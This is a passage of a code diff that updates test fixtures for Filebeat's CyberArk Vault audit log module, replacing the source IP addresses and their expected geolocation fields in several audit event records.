         "cyberarkpas.audit.target_user": "PSMP_ADB_asr-cyberark-psm-ssh",
         "cyberarkpas.audit.timestamp": "Mar 14 05:57:21",
         "event.action": "add group member",
@@ -642,23 +618,26 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 11389,
+        "log.offset": 11368,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "34.71.250.247"
+            "81.2.69.143"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "34.71.250.247",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "34.71.250.247",
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/266_remove_group_member.log b/x-pack/filebeat/module/cyberarkpas/audit/test/266_remove_group_member.log
index 7b0f9be88a0a..bf1f880b4479 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/266_remove_group_member.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/266_remove_group_member.log
@@ -1,2 +1,2 @@
-<5>1 2021-03-10T17:59:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:48","IsoTimestamp":"2021-03-10T17:59:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"266","Desc":"Remove Group Member","Severity":"Info","Issuer":"Administrator","Action":"Remove Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Group Member","GatewayStation":""}}}
-<5>1 2021-03-10T22:19:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:23","IsoTimestamp":"2021-03-10T22:19:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"266","Desc":"Remove Group Member","Severity":"Info","Issuer":"Administrator","Action":"Remove Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Group Member","GatewayStation":""}}}
+<5>1 2021-03-10T17:59:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:48","IsoTimestamp":"2021-03-10T17:59:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"266","Desc":"Remove Group Member","Severity":"Info","Issuer":"Administrator","Action":"Remove Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Group Member","GatewayStation":""}}}
+<5>1 2021-03-10T22:19:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:23","IsoTimestamp":"2021-03-10T22:19:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"266","Desc":"Remove Group Member","Severity":"Info","Issuer":"Administrator","Action":"Remove Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Group Member","GatewayStation":""}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/266_remove_group_member.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/266_remove_group_member.log-expected.json
index 9fe62e5d167d..14455bbf1e46 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/266_remove_group_member.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/266_remove_group_member.log-expected.json
@@ -9,7 +9,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMMaster",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.target_user": "Administrator",
         "cyberarkpas.audit.timestamp": "Mar 10 09:59:48",
         "event.action": "remove group member",
@@ -29,19 +29,16 @@
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -57,7 +54,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMMaster",
-        "cyberarkpas.audit.station": "35.192.121.42",
+        "cyberarkpas.audit.station": "67.43.156.12",
         "cyberarkpas.audit.target_user": "Administrator",
         "cyberarkpas.audit.timestamp": "Mar 10 14:19:23",
         "event.action": "remove group member",
@@ -70,25 +67,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 607,
+        "log.offset": 606,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "35.192.121.42"
+            "67.43.156.12"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "35.192.121.42",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 38.6583,
-        "source.geo.location.lon": -77.2481,
-        "source.geo.region_iso_code": "US-VA",
-        "source.geo.region_name": "Virginia",
-        "source.ip": "35.192.121.42",
+        "source.address": "67.43.156.12",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/273_remove_owner.log b/x-pack/filebeat/module/cyberarkpas/audit/test/273_remove_owner.log
index ea1458e58749..c03e8c662a93 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/273_remove_owner.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/273_remove_owner.log
@@ -1 +1 @@
-<5>1 2021-03-10T17:59:33Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:33","IsoTimestamp":"2021-03-10T17:59:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"273","Desc":"Remove Owner","Severity":"Info","Issuer":"Administrator","Action":"Remove Owner","SourceUser":"Administrator","TargetUser":"","Safe":"PSMSessions","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Owner","GatewayStation":""}}}
+<5>1 2021-03-10T17:59:33Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:33","IsoTimestamp":"2021-03-10T17:59:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"273","Desc":"Remove Owner","Severity":"Info","Issuer":"Administrator","Action":"Remove Owner","SourceUser":"Administrator","TargetUser":"","Safe":"PSMSessions","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Owner","GatewayStation":""}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/273_remove_owner.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/273_remove_owner.log-expected.json
index 6fd2e81ca83c..78850be98327 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/273_remove_owner.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/273_remove_owner.log-expected.json
@@ -10,7 +10,7 @@
         "cyberarkpas.audit.safe": "PSMSessions",
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "Administrator",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 09:59:33",
         "event.action": "remove owner",
         "event.code": "273",
@@ -29,19 +29,16 @@
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/294_store_password.log b/x-pack/filebeat/module/cyberarkpas/audit/test/294_store_password.log
index 2ea7c7cf1326..995c9971202c 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/294_store_password.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/294_store_password.log
@@ -2,8 +2,8 @@
 <5>1 2021-03-08T18:24:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:24:49","IsoTimestamp":"2021-03-08T18:24:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WinDesktopLocal-Address-adriansr","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"10.0.1.20"}}}
 <5>1 2021-03-08T19:20:02Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 11:20:02","IsoTimestamp":"2021-03-08T19:20:02Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDesktopLocal"},{"Name":"UserName","Value":"x_accountA"},{"Name":"Address","Value":"components"},{"Name":"ResetImmediately","Value":"ChangeTask"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"SequenceID","Value":"26"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"StartChangeNotBefore","Value":"1615231182"},{"Name":"GroupName","Value":"WindowsGroup"},{"Name":"LastSuccessChange","Value":"1614785704"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"Index","Value":"1"},{"Name":"DualAccountStatus","Value":"Inactive"},{"Name":"VirtualUsername","Value":"virtual"}]}}}}
 <5>1 2021-03-10T14:38:57Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 06:38:57","IsoTimestamp":"2021-03-10T14:38:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Groups\\WindowsGroup","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WindowsDesktopLocalAccountsRotationalPolicy"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"LastSuccessChange","Value":"1615387136"},{"Name":"CurrInd","Value":"1"}]}}}}
-<5>1 2021-03-10T17:58:06Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:06","IsoTimestamp":"2021-03-10T17:58:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSMServer","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":""}}}
-<5>1 2021-03-10T22:17:26Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:26","IsoTimestamp":"2021-03-10T22:17:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":""}}}
+<5>1 2021-03-10T17:58:06Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:06","IsoTimestamp":"2021-03-10T17:58:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSMServer","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":""}}}
+<5>1 2021-03-10T22:17:26Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:26","IsoTimestamp":"2021-03-10T22:17:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":""}}}
 <5>1 2021-03-10T23:39:25Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 15:39:25","IsoTimestamp":"2021-03-10T23:39:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDesktopLocal"},{"Name":"UserName","Value":"x_accountB"},{"Name":"Address","Value":"components"},{"Name":"ResetImmediately","Value":"ChangeTask"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"SequenceID","Value":"24"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"StartChangeNotBefore","Value":"1615419536"},{"Name":"GroupName","Value":"WindowsGroup"},{"Name":"LastSuccessChange","Value":"1614868762"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"Index","Value":"2"},{"Name":"DualAccountStatus","Value":"Inactive"},{"Name":"VirtualUsername","Value":"virtual"}]}}}}
 <5>1 2021-03-14T11:48:26Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 04:48:26</Timestamp>\n    <IsoTimestamp>2021-03-14T11:48:26Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>294</MessageID>\n    <Desc>Store password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>Store password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>Test</Safe>\n    <File>Root\\Groups\\WindowsGroup</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Store password</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WindowsDesktopLocalAccountsRotationalPolicy\"></CAProperty>\n      <CAProperty Name=\"InProcess\" Value=\"ChangeTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ChangeTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessChange\" Value=\"1615722505\"></CAProperty>\n      <CAProperty Name=\"CurrInd\" Value=\"2\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 04:48:26","IsoTimestamp":"2021-03-14T11:48:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Groups\\WindowsGroup","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WindowsDesktopLocalAccountsRotationalPolicy"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"LastSuccessChange","Value":"1615722505"},{"Name":"CurrInd","Value":"2"}]}}}}
 <5>1 2021-03-15T10:12:21Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:12:21</Timestamp>\n    <IsoTimestamp>2021-03-15T10:12:21Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>294</MessageID>\n    <Desc>Store password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>Store password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>Test</Safe>\n    <File>Root\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Store password</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDesktopLocal\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"x_accountA\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"components\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ChangeTask\"></CAProperty>\n      <CAProperty Name=\"InProcess\" Value=\"ChangeTask\"></CAProperty>\n      <CAProperty Name=\"SequenceID\" Value=\"27\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ChangeTask\"></CAProperty>\n      <CAProperty Name=\"StartChangeNotBefore\" Value=\"1615754905\"></CAProperty>\n      <CAProperty Name=\"GroupName\" Value=\"WindowsGroup\"></CAProperty>\n      <CAProperty Name=\"LastSuccessChange\" Value=\"1615231204\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"Index\" Value=\"1\"></CAProperty>\n      <CAProperty Name=\"DualAccountStatus\" Value=\"Inactive\"></CAProperty>\n      <CAProperty Name=\"VirtualUsername\" Value=\"virtual\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:12:21","IsoTimestamp":"2021-03-15T10:12:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDesktopLocal"},{"Name":"UserName","Value":"x_accountA"},{"Name":"Address","Value":"components"},{"Name":"ResetImmediately","Value":"ChangeTask"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"SequenceID","Value":"27"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"StartChangeNotBefore","Value":"1615754905"},{"Name":"GroupName","Value":"WindowsGroup"},{"Name":"LastSuccessChange","Value":"1615231204"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"Index","Value":"1"},{"Name":"DualAccountStatus","Value":"Inactive"},{"Name":"VirtualUsername","Value":"virtual"}]}}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/294_store_password.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/294_store_password.log-expected.json
index 1e1ee0d8496c..5fa08fdb5afd 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/294_store_password.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/294_store_password.log-expected.json
@@ -208,7 +208,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSM",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 09:58:06",
         "event.action": "store password",
         "event.code": "294",
@@ -228,19 +228,16 @@
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -257,7 +254,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSM",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "35.192.121.42",
+        "cyberarkpas.audit.station": "67.43.156.12",
         "cyberarkpas.audit.timestamp": "Mar 10 14:17:26",
         "event.action": "store password",
         "event.code": "294",
@@ -270,25 +267,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 4455,
+        "log.offset": 4454,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "35.192.121.42"
+            "67.43.156.12"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "35.192.121.42",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 38.6583,
-        "source.geo.location.lon": -77.2481,
-        "source.geo.region_iso_code": "US-VA",
-        "source.geo.region_name": "Virginia",
-        "source.ip": "35.192.121.42",
+        "source.address": "67.43.156.12",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -335,7 +330,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 5053,
+        "log.offset": 5051,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
@@ -383,7 +378,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 6472,
+        "log.offset": 6470,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
@@ -442,7 +437,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 8761,
+        "log.offset": 8759,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
@@ -499,7 +494,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 12415,
+        "log.offset": 12413,
         "log.syslog.priority": "5",
         "network.direction": "internal",
         "observer.hostname": "VAULT",
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/300_psm_connect.log b/x-pack/filebeat/module/cyberarkpas/audit/test/300_psm_connect.log
index 74928df0a234..1781ee46b466 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/300_psm_connect.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/300_psm_connect.log
@@ -1,17 +1,17 @@
 {"format":"elastic","version":"1.0","raw":"<syslog>\n  <audit_record>\n    <Rfc5424>no</Rfc5424>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.6.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>Linux</Safe>\n    <File>Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2</File>\n    <Station>10.2.0.7</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" 